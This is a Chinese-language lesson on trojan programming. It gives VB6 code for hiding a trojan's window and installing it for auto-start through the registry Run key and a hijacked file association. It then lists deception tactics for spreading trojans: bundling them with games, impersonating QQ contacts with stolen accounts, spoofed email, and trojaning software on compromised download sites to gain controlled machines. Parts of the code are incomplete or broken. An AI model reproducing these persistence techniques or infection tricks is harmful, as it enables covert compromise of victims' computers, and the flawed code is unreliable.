第十三课 木马编程实例讲解

第二节 木马的隐藏和运行

一，木马的隐藏

   做好自身的隐藏，是木马的应该做的必要的工作之一。

  1， 在任务栏中消失

   如果不想在windows的任务栏出现运行时图标，我们可以把窗体的 showintaskbar属性设置为 false ，就可以了。
 
  2， 桌面上不出现界面

   实现这个目标，可以设置窗体的 Visible 属性，使它等于 False，就可以了。
 
  3， 程序在后台运行

   后台运行时，也是看不到界面的。我们可以使用窗体的hide方法，即 me.hide，使窗体对用户隐藏。

 
　4， 端口的隐藏

   端口的隐藏说起来其实就是让木马使用非常用端口。机器有0-65535个端口，木马一般使用较高的端口。虽然说可用命令或工具还是可以轻易发现，但是，当对方没有忧患意识时，只要你所占用的端口没有干扰系统的正常运行，就有机会悄悄的运行。

  5， 加载过程的隐藏

   隐形加载就是让对方在不知不觉中，运行你的木马。
   
二，木马的运行

木马的运行包括人为点击运行和自启动运行。人为点击一般采用欺骗的方式。我们这里只是学习它的自启动。

  1，利用注册表自启动

     把要运行的程序加载在run键下。
 
  该键的位置在：HKEY_LOCAL_MACHINE 下，SoftWare\Microsoft\Windows\CurrentVersion\Run

   相关代码如下：
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
   ‘以上是api函数声明

Sub SetMyvalue(hKey As Long, strPath As String, strvalue As String, strData As String)
Dim keyHandle
Dim lResult As Long
lResult = RegCreateKey(hKey, strPath, keyHandle)
lResult = RegSetvalueEx(keyHandle, strvalue, 0, REG_SZ, ByVal strData, Len(strData))
lResult = RegCloseKey(keyHandle)
End Sub

  ‘setmyvalue函数用来改写注册表
dim a as string
dim b as string
a=text1
b=text2
setmyvalue

  2，利用文件关联自启动

    文件的关联就是特定程序打开一些特定扩展名的文件。

简单讲下怎么使用和查询API函数
regclosekey
regcreatekey
regsetvalue

Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetvalue Lib "advapi32.dll" Alias "RegSetvalueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long                 
Const HKEY_CLASSES_ROOT = &H80000000
Const REG_SZ = 1
    ’以上是声明部分

Private Sub Command1_Click()
 Dim sKeyName As String   
 Dim sKeyvalue As String   
 Dim lResult As Long    
 Dim keyhandle As Long
 sKeyName = "bbbb"
 sKeyvalue = "TestApp"
 lResult = RegCreateKey(HKEY_CLASSES_ROOT, sKeyName, keyhandle)
 lResult = RegSetvalue(keyhandle, "", REG_SZ, sKeyvalue, 0)
  sKeyName = ".bing"
 sKeyvalue = "bbbb"
 lResult = RegCreateKey(HKEY_CLASSES_ROOT, sKeyName, keyhandle)
 lResult = RegSetvalue(keyhandle, "", REG_SZ, sKeyvalue, 0)
 sKeyName = "bbbb"
 sKeyvalue = "e:\page\mdnx.exe "
 lResult = RegCreateKey(HKEY_CLASSES_ROOT, sKeyName, keyhandle)
 lResult = RegSetvalue(keyhandle, "shell\open\command", REG_SZ, sKeyvalue, MAX_PATH)
End Sub

 
   木马常用骗术

　　1、捆绑欺骗。把木马服务端和某个游戏捆绑成一个文件在QQ或邮件发给别人。服务端运行后会看到游戏程序正常打开，却不会发觉木马程序已经悄悄运行，可以起到很好的迷惑作用。而且即使别人以后重装系统了，他还是保存你给他的这个“游戏”的话，还是有可能再次中招。

　　2、这是教科书式的老式欺骗，方法如下：直接将木马服务端发给对方，对方运行，结果毫无反应（运行木马后的典型表现），他说：“怎么打不开呀！”你说：“哎呀，不会程序是坏了吧？”或者说：“对不起，我发错了！”然后把正确的东西（正常游戏、相片等）发给他，他收到后欢天喜地的就不想刚才该发生的事有什么不对劲了。

　　3、QQ冒名欺骗。前提：你必须先拥有一个不属于你自己的QQ号。然后使用那个号码给他的好友们发去木马程序，由于信任被盗号码的主人，他的朋友们会毫不犹豫地运行你发给他们的木马程序，结果就中招了。

　　4、邮件冒名欺骗。和第三种方法类似，用匿名邮件工具冒充好友或大型网站、机构单位向别人发木马附件，别人下载附件并运行的话就中木马了。

　　5、危险下载点。这是后面几位朋友提到的，蔬菜常用的方法：（据说他已经用这种方法得到了数千台肉鸡）攻破一些下载站点后，下载几个下载量大的软件，捆绑上木马，再悄悄放回去让别人下载，这样以后每增加一次下载次数，你就等于多了一台肉鸡。或者你干脆把木马捆绑到其它软件上,然后"正大光明"的发布到各大软件下载网站,它们也不查毒,就算查也查不出我写的新木马,然后...我就不用说了,肉机会至少两位数。

　　6、文件夹惯性点击。把木马文件伪装成文件夹图标后，放在一个文件夹中，然后在外面再套三四个空文件夹，很多人出于连续点击的习惯，点到那个伪装成文件夹木马时，也会收不住鼠标点下去，这样木马就成功运行了。

　　7、zip伪装。这个方法是最新的，将一个木马和一个损坏的zip包（可自制）捆绑在一起，然后指定捆绑后的文件为zip图标，这样一来，除非别人看了他的后缀，否则点下去将和一般损坏的zip没什么两样，根本不知道其实已经有木马在悄悄运行了。

　　8、在某个公文包或者可以上传附件的论坛传上捆绑好的木马，然后把链接发给受害者。

　　9、用winrar捆绑木马。